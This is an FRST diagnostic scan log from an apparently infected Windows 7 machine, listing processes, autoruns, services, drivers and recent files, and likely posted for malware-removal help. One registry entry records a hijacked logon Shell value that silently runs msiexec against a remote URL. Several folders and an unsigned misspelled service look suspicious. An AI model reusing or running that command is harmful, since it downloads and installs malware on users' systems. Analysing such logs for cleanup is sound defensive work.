Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-05-2017 Ran by fundowic (administrator) on HU1W7L-107315 (13-05-2017 09:59:26) Running from E:\ Loaded Profiles: fundowic (Available Profiles: fundowic) Platform: Windows 7 Enterprise Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe (IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFSrvWsc.exe (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Pulse Secure, LLC) C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\HidMonitorSvc.exe (McAfee, Inc.) C:\Program Files\McAfee\Agent\macmnsvc.exe (McAfee, Inc.) C:\Program Files\McAfee\Agent\masvc.exe (Microsoft Corporation) C:\Program Files\Microsoft\MDOP MBAM\MBAMAgent.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe (Pulse Secure, LLC) C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (McAfee, Inc.) C:\Windows\System32\mfevtps.exe (MKS Software Inc.) C:\Windows\System32\nutsrv4.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\pg_ctl.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe (McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe (McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\macompatsvc.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe () C:\Windows\System32\igfxTray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE () C:\Program Files (x86)\Common Files\Pulse Secure\JamUI\Pulse.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe (McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\mctray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe (IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe (BayHubTech/O2Micro International) C:\Windows\System32\drivers\o2flash.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [727896 2014-12-22] (Alps Electric Co., Ltd.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-12-22] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_MAXX6] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-12-22] (Realtek Semiconductor) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472984 2013-12-10] (Adobe Systems Incorporated) HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation) HKLM-x32\...\Run: [PulseSecure] => C:\Program Files (x86)\Common Files\Pulse Secure\JamUI\Pulse.exe [3209176 2016-11-30] () HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.) HKLM-x32\...\Run: [NuTCSetupEnviron] => C:\Program Files (x86)\MKS Toolkit\bin\ncoeenv.exe [37160 2008-10-30] (MKS Software Inc.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation) HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe [516432 2017-01-05] (McAfee, Inc.) HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5296416 2017-04-11] (IObit) HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\Office15\lync.exe [24146632 2016-09-13] (Microsoft Corporation) HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\MountPoints2: {d89af5d9-3797-11e6-b29d-185e0faf7b8d} - E:\AutoRun.exe Startup: C:\Users\fundowic\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk [2016-05-19] ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) GroupPolicy: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 192.168.1.1 Tcpip\..\Interfaces\{1DF9DAF4-EA53-4A79-B366-CA85A6D77631}: [DhcpNameServer] 192.168.1.1 192.168.1.1 Tcpip\..\Interfaces\{6CA3778C-8DAF-4D68-BF68-B888A309FE93}: [NameServer] 10.1.2.50,10.98.64.41 Tcpip\..\Interfaces\{8BD0C3FB-99DC-4EA2-B071-2109AF3C05F3}: [NameServer] 10.1.2.50,10.98.64.41 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2017-03-28] (IObit) BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2016-09-13] (Microsoft Corporation) BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation) BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20160309165456.dll [2016-03-09] (McAfee, Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-21] (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2016-08-16] (Microsoft Corporation) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-09-13] (Microsoft Corporation) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-24] (Oracle Corporation) BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20160309165457.dll [2016-03-09] (McAfee, Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-24] (Oracle Corporation) DPF: HKLM {583C990C-2D38-410c-9A4A-0932D66A754F} hxxps://pulsesecure.net/dana-cached/sc/PulseSetupClient64.cab DPF: HKLM-x32 {8E375A63-C616-46F1-AC77-59DF78F3A826} hxxps://pulsesecure.net/dana-cached/sc/PulseSetupClient.cab FireFox: ======== FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2017-04-27] [not signed] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw.dll [2014-11-07] (Adobe Systems, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-24] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-24] (Oracle Corporation) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-13] (Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation) FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-09-13] (Microsoft Corporation) Chrome: ======= CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 ApHidMonitorService; C:\Program Files\DellTPad\HidMonitorSvc.exe [87384 2014-12-22] (Alps Electric Co., Ltd.) S2 CcmExec; C:\WINDOWS\CCM\CcmExec.exe [1785528 2016-06-20] (Microsoft Corporation) S4 CmRcService; C:\WINDOWS\CCM\RemCtrl\CmRcService.exe [698552 2016-06-20] (Microsoft Corporation) R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [328296 2014-12-22] (Intel Corporation) R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [1764640 2017-04-11] (IObit) S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2017-03-28] (IObit) S3 lpasvc; C:\Program Files\Microsoft Policy Platform\policyHost.exe [50352 2016-05-31] (Microsoft Corporation) S3 lppsvc; C:\Program Files\Microsoft Policy Platform\policyHost.exe [50352 2016-05-31] (Microsoft Corporation) R2 macmnsvc; C:\Program Files\McAfee\Agent\macmnsvc.exe [141136 2017-01-05] (McAfee, Inc.) R2 masvc; C:\Program Files\McAfee\Agent\masvc.exe [56656 2017-01-05] (McAfee, Inc.) R2 MBAMAgent; C:\Program Files\Microsoft\MDOP MBAM\MBAMAgent.exe [323304 2014-03-04] (Microsoft Corporation) R3 McAfeeFramework; C:\Program Files\McAfee\Agent\x86\macompatsvc.exe [213840 2017-01-05] (McAfee, Inc.) R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2016-03-09] (McAfee, Inc.) R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe [215104 2015-10-29] (McAfee, Inc.) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [384528 2017-04-21] (McAfee, Inc.) R3 mfevtp; C:\WINDOWS\system32\mfevtps.exe [316432 2016-11-18] (McAfee, Inc.) R2 NuTCRACKERService; C:\WINDOWS\system32\nutsrv4.exe [442592 2008-10-30] (MKS Software Inc.) R2 O2FLASH; C:\WINDOWS\system32\DRIVERS\o2flash.exe [65536 2014-12-22] (BayHubTech/O2Micro International) R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed] R2 postgresql-x64-9.4; C:\Program Files\PostgreSQL\9.4\bin\pg_ctl.exe [92160 2015-12-07] (PostgreSQL Global Development Group) [File not signed] R2 PulseSecureService; C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe [182232 2016-11-30] (Pulse Secure, LLC) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-12-22] (Realtek Semiconductor) S3 smstsmgr; C:\WINDOWS\CCM\TSManager.exe [324792 2016-06-20] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-03-10] (Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [36096 2014-12-16] (Advanced Micro Devices, Inc.) R3 BCMNFCSCR; C:\WINDOWS\System32\DRIVERS\bcmnfcscr7.sys [41728 2014-12-22] (Broadcom Corporation.) R3 bcmnfcusb; C:\WINDOWS\System32\DRIVERS\bcmnfcusb7.sys [44288 2014-12-22] (Broadcom Corporation.) R3 dptf_acpi; C:\WINDOWS\System32\DRIVERS\dptf_acpi.sys [41824 2014-12-22] (Intel Corporation) R3 dptf_cpu; C:\WINDOWS\System32\DRIVERS\dptf_cpu.sys [35136 2014-12-22] (Intel Corporation) S3 dsNcAdpt; C:\WINDOWS\System32\DRIVERS\dsNcAdpt.sys [36816 2015-08-05] (Juniper Networks) [File not signed] R3 e1dexpress; C:\WINDOWS\System32\DRIVERS\e1d62x64.sys [489752 2014-12-22] (Intel Corporation) R0 iaStorF; C:\WINDOWS\System32\drivers\iaStorF.sys [28008 2014-12-22] (Intel Corporation) R1 IMFCameraProtect; C:\WINDOWS\system32\drivers\IMFCameraProtect.sys [26272 2017-03-29] (IObit.com) R3 IMFDownProtect; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFDownProtect.sys [21360 2017-03-08] (IObit.com) R3 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [22440 2016-12-22] (IObit) R3 IMFForceDelete; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFForceDelete.sys [16216 2017-03-29] (IObit.com) R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RTDVHD64.sys [2642264 2014-12-22] (Realtek Semiconductor Corp.) S3 ISCT; C:\WINDOWS\system32\drivers\ISCTD.sys [44744 2014-12-22] () R1 jnprns; C:\WINDOWS\System32\DRIVERS\jnprns.sys [507192 2015-12-17] (Juniper Networks) S4 jnprTdi_824_597; C:\WINDOWS\system32\Drivers\jnprTdi_824_597.sys [106176 2016-06-01] (Pulse Secure, LLC) S3 jnprva; C:\WINDOWS\System32\DRIVERS\jnprva.sys [30072 2015-12-17] (Juniper Networks, Inc.) R3 JnprVaMgr; C:\WINDOWS\System32\DRIVERS\jnprvamgr.sys [45352 2015-12-17] (Juniper Networks, Inc.) S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [39704 2014-12-22] (Atheros) R3 MEIx64; C:\WINDOWS\System32\DRIVERS\TeeDriverx64.sys [129312 2014-12-22] (Intel Corporation) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [479288 2016-11-18] (McAfee, Inc.) R3 mfeaacsk; C:\WINDOWS\System32\drivers\mfeaacsk.sys [64416 2016-03-09] (McAfee, Inc.) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [364600 2016-11-18] (McAfee, Inc.) U3 mfeavfk01; no ImagePath R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [496888 2016-03-09] (McAfee, Inc.) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [877624 2016-11-18] (McAfee, Inc.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110136 2016-11-18] (McAfee, Inc.) S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [114880 2016-03-09] (McAfee, Inc.) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [344704 2016-03-09] (McAfee, Inc.) R3 NETwNs64; C:\WINDOWS\System32\DRIVERS\Netwsw02.sys [3429144 2014-12-22] (Intel Corporation) R3 O2FJ2RDR; C:\WINDOWS\System32\DRIVERS\O2FJ2w7x64.sys [210592 2014-12-22] (BayHubTech/O2Micro ) S3 prepdrvr; C:\WINDOWS\System32\DRIVERS\prepdrv.sys [26984 2013-09-11] (Microsoft Corporation) R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34752 2016-11-03] (IObit.com) S3 ST7007; C:\WINDOWS\system32\drivers\ST7007.sys [69896 2014-12-22] (STMicroelectronics) R3 ST_Accel; C:\WINDOWS\System32\DRIVERS\ST_Accel.sys [75952 2014-12-22] (STMicroelectronics) S3 swg3knmea05; C:\WINDOWS\system32\drivers\swg3knmea05.sys [275216 2014-12-22] (Sierra Wireless Incorporated) S3 swg3kser05; C:\WINDOWS\system32\drivers\swg3kser05.sys [275216 2014-12-22] (Sierra Wireless Incorporated) S3 swibus05; C:\WINDOWS\system32\drivers\swibus05.sys [88848 2014-12-22] (Sierra Wireless Inc.) S3 swibusflt05; C:\WINDOWS\system32\drivers\swibusflt05.sys [88848 2014-12-22] (Sierra Wireless Inc.) R3 wbfcvusbdrv; C:\WINDOWS\System32\Drivers\wbfcvusbdrv.sys [17632 2014-12-22] () S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-05-13 09:59 - 2017-05-13 09:59 - 00000000 ____D C:\FRST 2017-05-12 23:02 - 2017-05-12 23:09 - 00000000 ____D C:\ProgramData\ProductData 2017-05-12 22:55 - 2017-05-12 22:55 - 00004753 _____ C:\Users\fundowic\Desktop\JRT.txt 2017-05-12 22:49 - 2017-05-13 09:54 - 00000066 _____ C:\Users\Public\Documents\temp.dat 2017-05-12 22:42 - 2017-05-12 23:01 - 00000000 ____D C:\AdwCleaner 2017-05-12 22:32 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller 2017-05-12 22:32 - 2017-05-12 22:32 - 00001377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller.lnk 2017-05-12 22:32 - 2017-05-12 22:32 - 00001365 _____ C:\Users\Public\Desktop\IObit Uninstaller.lnk 2017-05-12 22:18 - 2017-05-12 22:18 - 00121142 _____ C:\WINDOWS\ntbtlog.txt 2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\IObit 2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\Users\fundowic\AppData\LocalLow\IObit 2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter 2017-05-12 20:03 - 2017-05-12 20:03 - 00001184 _____ C:\Users\Public\Desktop\IObit Malware Fighter.lnk 2017-05-12 20:03 - 2017-03-29 18:05 - 00026272 _____ (IObit.com) C:\WINDOWS\system32\Drivers\IMFCameraProtect.sys 2017-05-12 20:02 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\IObit 2017-05-12 20:02 - 2017-05-12 22:32 - 00000000 ____D C:\Program Files (x86)\IObit 2017-05-12 20:02 - 2017-05-12 20:02 - 00000000 ____D C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705} 2017-05-11 13:18 - 2017-05-12 22:45 - 00000000 ____D C:\WINDOWS\system32\log 2017-05-11 13:18 - 2017-05-12 19:47 - 00000000 ____D C:\Users\fundowic\AppData\LocalLow\Mozilla 2017-05-11 13:18 - 2017-05-11 13:18 - 00002099 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-05-11 13:18 - 2017-05-11 13:18 - 00001941 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\Public\Documents\Google 2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\Mozilla 2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\fundowic\AppData\Local\Bagsarah 2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 ____D C:\Program Files (x86)\Bagsarah 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\33 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\1111 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\00 2017-05-11 13:12 - 2017-05-11 13:16 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2017-05-10 10:08 - 2017-05-10 10:08 - 00165431 _____ C:\Users\fundowic\Desktop\wojska_specjalne_wp.pdf 2017-04-28 20:44 - 2017-05-09 13:11 - 00000000 ____D C:\Users\fundowic\Desktop\DoWywolania 2017-04-22 17:17 - 2017-04-22 17:17 - 00000000 ____D C:\Program Files\Common Files\Intel 2017-04-19 21:23 - 2017-04-19 21:23 - 00000000 ____D C:\Users\fundowic\AppData\Local\CEF 2017-04-18 14:28 - 2017-04-18 14:28 - 00000000 ____D C:\Users\Default\AppData\Local\Adobe 2017-04-18 14:28 - 2017-04-18 14:28 - 00000000 ____D C:\Users\Default User\AppData\Local\Adobe 2017-04-15 16:19 - 2017-04-15 16:19 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\SSMgre ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-05-13 09:54 - 2015-03-04 11:33 - 00000000 ____D C:\WINDOWS\ccmsetup 2017-05-12 23:17 - 2016-04-13 10:49 - 00000000 ____D C:\Users\fundowic\AppData\Local\CrashDumps 2017-05-12 23:14 - 2009-07-14 06:45 - 00019104 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-05-12 23:14 - 2009-07-14 06:45 - 00019104 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-05-12 23:05 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\system32\NDF 2017-05-12 23:02 - 2009-07-14 07:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-05-12 23:01 - 2016-03-11 10:00 - 00000000 ____D C:\Users\fundowic 2017-05-12 23:01 - 2016-03-09 16:38 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-05-12 23:01 - 2016-03-09 16:38 - 00000000 ____D C:\WINDOWS\system32\Macromed 2017-05-12 23:01 - 2015-03-04 11:36 - 00000000 ____D C:\WINDOWS\CCM 2017-05-12 23:01 - 2011-04-12 09:45 - 00000000 ___RD C:\Users\Public\Recorded TV 2017-05-12 23:01 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\registration 2017-05-12 23:01 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\inf 2017-05-12 22:45 - 2016-12-09 21:40 - 00000000 ____D C:\Quarantine 2017-05-12 20:49 - 2016-03-11 21:39 - 00000000 ____D C:\Program Files (x86)\Google 2017-05-12 19:51 - 2016-03-14 10:32 - 00000000 ____D C:\Users\fundowic\AppData\Local\ElevatedDiagnostics 2017-05-12 19:23 - 2016-03-11 21:40 - 00000000 ____D C:\Users\fundowic\AppData\Local\Google 2017-05-12 19:21 - 2016-03-09 17:51 - 00000000 ____D C:\Program Files (x86)\McAfee 2017-05-12 19:20 - 2016-03-09 17:47 - 00000000 ____D C:\Program Files\Common Files\McAfee 2017-05-12 19:19 - 2016-03-09 17:47 - 00000000 ____D C:\ProgramData\McAfee 2017-05-12 12:39 - 2016-03-11 10:02 - 00003918 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F98ED762-D443-493A-AC3A-6E5B73F1BFAA} 2017-05-11 13:18 - 2016-03-11 21:40 - 00002276 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-05-09 12:56 - 2016-05-18 16:19 - 00000000 ____D C:\Users\fundowic\Desktop\national 2017-05-08 05:35 - 2009-07-14 07:13 - 00787902 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-04-29 14:55 - 2016-11-07 12:01 - 00000000 ____D C:\Zdjęcia 2017-04-28 20:48 - 2017-01-06 12:02 - 00000000 ____D C:\Filmy 2017-04-28 20:47 - 2015-03-04 11:33 - 00000638 _____ C:\WINDOWS\SMSCFG.INI 2017-04-25 19:32 - 2016-03-09 16:40 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk 2017-04-22 17:13 - 2009-07-14 07:32 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-04-21 13:21 - 2016-03-09 17:46 - 00044931 __RSH 